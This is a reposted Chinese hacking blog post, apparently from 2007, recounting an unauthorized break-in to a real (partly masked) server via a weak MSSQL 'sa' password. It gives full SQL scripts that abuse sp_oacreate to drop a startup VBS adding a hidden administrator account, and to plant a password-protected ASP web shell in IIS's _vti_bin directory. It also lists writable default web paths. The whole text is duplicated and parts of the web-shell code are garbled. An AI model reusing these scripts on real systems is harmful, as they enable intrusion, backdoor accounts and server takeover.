对1433端口SA权限的再突破
2007-09-07 13:39
302 查看
***X档案青野志狼有一篇文章>。文章写到了在知道sql服务器的SA用户名弱密码后,而服务器去掉了SA的xp_cmdshell权限的情况下,如何通过SQL命令恢复SA的xp_cmdshell权限来进行***。这样***(详细请看原文)的前提是服务器的xplog70.dll没有被删除或改名,这一点青野志狼也谈到了,但是他没有写在xplog70.dll被删掉或改名的情况下的***方法。这里就把我曾经在这样情况下一次成功的黑站验给大家分享一下。
先来看我对xx.41.153.190的扫描结果。x-scan2.3扫描后的详细漏洞表如下:
[开放端口]21/80/1433/3389
[sql弱口令]sa(aaa)
[CGI漏洞]
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 [漏洞描述]
/_vti_bin/shtml.dll/nosuch.htm [漏洞描述]
/_vti_bin/shtml.dll [漏洞描述]
/_vti_bin/shtml.dll/_vti_rpc [漏洞描述]
/_vti_bin/shtml.exe [漏洞描述]
除了这几个漏洞,x-scan2.3再没有扫出别的了,好在有sql弱口令。用sql连接器连上看看吧,可大失所望。dir命令不能执行,好像是服务器去掉了SA的xp_cmdshell权限。
我再用sql的查循分析器来连接SQL服务器恢复cmd_shell权限试试。在sql的查循分析器里写入 sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll',但是显示错误。
看样子是xplog70.dll被改名了。抱着试试看看的态度,再用sql连接器连上,执行dir命令,依然依显示图1的情况。
这种情况下怎么办呢?既然有了sql弱口令,而且sql的查循分析器也可以连接上,当然也可以用它来写一些文本程序在服务器上。再打开查循分析器,在弹出的文本框里写入以下sql脚本命令:
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
---给菜鸟加个简单注释,这两行代码是建立sql的文本对象
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs', 1
---在启动菜单里写入a.vbs,当然这里只支持中文
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wshshell=createobject("wscript.shell")'
---单引号里的都是a.vbs的内容,要一行一行的写,下同。
exec @ret = sp_oamethod @f, 'writeline', NULL,
'a=wshshell.run ("cmd.exe /c net user lcx 123 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'b=wshshell.run ("cmd.exe /c net localgroup administrators lcx /add",0)'
---a.vbs内容结束
执行查循后,这样就会在服务器的启动程序里写入一个a.vbs脚本。
只要服务器重启,就可以加入一个用户名是lcx,密码是123的管理员用户了。做完这一切后我就开始等待服务器重启了,可是等到花儿也谢了,这个用户也没加成功,我用lcx的用户名和密码123一直也登陆不了3389端口。不知是服务器没重启,还是服务器不是中文系统(因为这个sql脚本只支持中文),还是被管理员发现了,总之就是没加成功。在这之后,我就陷入了深思。于是回头看x-scan的漏洞扫描报告,上安全焦点查了一些扫到的漏洞资料,还是一无所获,扫到的漏洞都没有太大的利用价值。思考中,突然灵光一闪,_vti_bin是一个虚拟目录,在IIS上默认的物理路径是C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\,我可以在这里用sql的查循分析器写入一个asp程序呀。先看看思路对不对,执行http://ip/_vti_bin/,返回403错误码。
证明服务器这个虚拟目录是存在的。好了,我开始写sql脚本,一行一行写得好累呀,做个***也不容易呀(本想写入海阳顶端网***xp.net版。可代码太多了):
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
---给菜鸟加个简单注释:还是建立sql程序的文本对像
exec sp_oamethod @o, 'createtextfile', @f out,
'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\isapi\\lcx.asp', 1
---在这个目录写入一个lcx.asp文件,没有就生成,你可以根据需要改成别的目录。
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
'? ?'
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
'" method="POST">'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'">'
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
' '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' "") Then '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'szTempFile = "C:\" & oFileSys.GetTempName( ) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' End If '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'If (IsObject(oFile)) Then'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'On Error Resume Next'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Response.Write Server.HTMLEncode(oFile.ReadAll) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' oFile.Close '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' Call oFileSys.DeleteFile(szTempFile, True)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'End If %> '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'??'
exec @ret = sp_oamethod @f, 'writeline', NULL,
' '
---好累,代码终于写完了
然后我将这段脚本放在查循分析器里执行,运气不错,服务器的iis是默认安装的,显示命令成功完成。
迫不及待的来看看运行结果吧。
哈,成功了。忘记告诉你,刚才运行的这段sql脚本,会在C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\这个物理目录下,也就是虚拟目录_vti_bin目录下生成lcx.asp这个asp文件,是一个改装的cmd.asp了,密码是1234。输入密码1234后,再来看看,得到一个cmd的网页shell了。
虽然权限不是很大,但是查看服务器敏感信息,黑掉服务器的网页是绰绰有余的。我就用这个lcx.asp在服务器的C:\Program Files\Microsoft SQL Server\MSSQL\Binn这个目录里发现了一个可疑的xplog701.dll文件,和原来的文件大小比较,果然是一个改名的xplog70.dll。也许有的人要说,你可以再将名字改回来呀。我也试过,虽然改过名,也需要重启mssql服务,这个xplog70.dll才可以加载。看样子我的运气到了尽头,在这台机器上再没有得到太多******结果了。
后来我在本机做过测试,我是w2k+sp3+iis5.0+fat32系统,在默认安装情况下,一些默认的虚拟目录用sql 查循分析器大都是可写的,而且这些默认的虚拟目录对应的物理目录都是固定的。除了上文讲到的_vti_bin外,还有像http://ip/printers对应的是C:\WINNT\web\printers,http://ip/对应的是c:\inetpub\wwwroot等等。所以平常说的暴露物理路径的危害由此实例可以管中窥豹了。
先来看我对xx.41.153.190的扫描结果。x-scan2.3扫描后的详细漏洞表如下:
[开放端口]21/80/1433/3389
[sql弱口令]sa(aaa)
[CGI漏洞]
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 [漏洞描述]
/_vti_bin/shtml.dll/nosuch.htm [漏洞描述]
/_vti_bin/shtml.dll [漏洞描述]
/_vti_bin/shtml.dll/_vti_rpc [漏洞描述]
/_vti_bin/shtml.exe [漏洞描述]
除了这几个漏洞,x-scan2.3再没有扫出别的了,好在有sql弱口令。用sql连接器连上看看吧,可大失所望。dir命令不能执行,好像是服务器去掉了SA的xp_cmdshell权限。
我再用sql的查循分析器来连接SQL服务器恢复cmd_shell权限试试。在sql的查循分析器里写入 sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll',但是显示错误。
看样子是xplog70.dll被改名了。抱着试试看看的态度,再用sql连接器连上,执行dir命令,依然依显示图1的情况。
这种情况下怎么办呢?既然有了sql弱口令,而且sql的查循分析器也可以连接上,当然也可以用它来写一些文本程序在服务器上。再打开查循分析器,在弹出的文本框里写入以下sql脚本命令:
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
---给菜鸟加个简单注释,这两行代码是建立sql的文本对象
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs', 1
---在启动菜单里写入a.vbs,当然这里只支持中文
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wshshell=createobject("wscript.shell")'
---单引号里的都是a.vbs的内容,要一行一行的写,下同。
exec @ret = sp_oamethod @f, 'writeline', NULL,
'a=wshshell.run ("cmd.exe /c net user lcx 123 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'b=wshshell.run ("cmd.exe /c net localgroup administrators lcx /add",0)'
---a.vbs内容结束
执行查循后,这样就会在服务器的启动程序里写入一个a.vbs脚本。
只要服务器重启,就可以加入一个用户名是lcx,密码是123的管理员用户了。做完这一切后我就开始等待服务器重启了,可是等到花儿也谢了,这个用户也没加成功,我用lcx的用户名和密码123一直也登陆不了3389端口。不知是服务器没重启,还是服务器不是中文系统(因为这个sql脚本只支持中文),还是被管理员发现了,总之就是没加成功。在这之后,我就陷入了深思。于是回头看x-scan的漏洞扫描报告,上安全焦点查了一些扫到的漏洞资料,还是一无所获,扫到的漏洞都没有太大的利用价值。思考中,突然灵光一闪,_vti_bin是一个虚拟目录,在IIS上默认的物理路径是C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\,我可以在这里用sql的查循分析器写入一个asp程序呀。先看看思路对不对,执行http://ip/_vti_bin/,返回403错误码。
证明服务器这个虚拟目录是存在的。好了,我开始写sql脚本,一行一行写得好累呀,做个***也不容易呀(本想写入海阳顶端网***xp.net版。可代码太多了):
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
---给菜鸟加个简单注释:还是建立sql程序的文本对像
exec sp_oamethod @o, 'createtextfile', @f out,
'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\isapi\\lcx.asp', 1
---在这个目录写入一个lcx.asp文件,没有就生成,你可以根据需要改成别的目录。
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
'? ?'
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
'" method="POST">'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'">'
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
exec @ret = sp_oamethod @f, 'writeline', NULL,
' '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' "") Then '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'szTempFile = "C:\" & oFileSys.GetTempName( ) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' End If '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'If (IsObject(oFile)) Then'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'On Error Resume Next'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Response.Write Server.HTMLEncode(oFile.ReadAll) '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' oFile.Close '
exec @ret = sp_oamethod @f, 'writeline', NULL,
' Call oFileSys.DeleteFile(szTempFile, True)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'End If %> '
exec @ret = sp_oamethod @f, 'writeline', NULL,
'??'
exec @ret = sp_oamethod @f, 'writeline', NULL,
' '
---好累,代码终于写完了
然后我将这段脚本放在查循分析器里执行,运气不错,服务器的iis是默认安装的,显示命令成功完成。
迫不及待的来看看运行结果吧。
哈,成功了。忘记告诉你,刚才运行的这段sql脚本,会在C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\这个物理目录下,也就是虚拟目录_vti_bin目录下生成lcx.asp这个asp文件,是一个改装的cmd.asp了,密码是1234。输入密码1234后,再来看看,得到一个cmd的网页shell了。
虽然权限不是很大,但是查看服务器敏感信息,黑掉服务器的网页是绰绰有余的。我就用这个lcx.asp在服务器的C:\Program Files\Microsoft SQL Server\MSSQL\Binn这个目录里发现了一个可疑的xplog701.dll文件,和原来的文件大小比较,果然是一个改名的xplog70.dll。也许有的人要说,你可以再将名字改回来呀。我也试过,虽然改过名,也需要重启mssql服务,这个xplog70.dll才可以加载。看样子我的运气到了尽头,在这台机器上再没有得到太多******结果了。
后来我在本机做过测试,我是w2k+sp3+iis5.0+fat32系统,在默认安装情况下,一些默认的虚拟目录用sql 查循分析器大都是可写的,而且这些默认的虚拟目录对应的物理目录都是固定的。除了上文讲到的_vti_bin外,还有像http://ip/printers对应的是C:\WINNT\web\printers,http://ip/对应的是c:\inetpub\wwwroot等等。所以平常说的暴露物理路径的危害由此实例可以管中窥豹了。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 对1433端口SA权限的再突破
- 对1433端口SA权限的再突破- -
- 对SA权限的再突破 (对付xplog70.dll被删)
- 对SA权限的再突破 (对付xplog70.dll被删)转载
- 对SA权限的再突破 (对付xplog70.dll被删)转载
- linux下mysql开启远程访问权限及防火墙开放3306端口
- 黑客经验谈之SA权限入侵的感悟
- Xp系统下sqlServer 2000中1433端口打不开的问题
- XP sp2 + SQL Server 2000 Developer环境开1433端口
- 突破单位封杀QQ、MSN端口的方法
- 利用socket转发和反弹端口技术突破防火墙进入内
- sql server 2000:不能打开到主机的连接,在端口1433:连接失败
- lcx端口转发实现内网突破
- 如何拒绝非本机的1433/1434端口tcp连接?
- 渗透常用端口突破
- 如何打开sql server 2005 的1433端口
- 安装SQL Server 2005 express没有权限,sa不能登录问题。
- SQL管理员sss或navicat premium连接自定义非1433端口说明
- 突破网管封QQ、MSN端口的方法
- 【转】Java JDBC连接SQL Server2005错误:通过端口 1433 连接到主机 localhost 的 TCP/IP 连接失败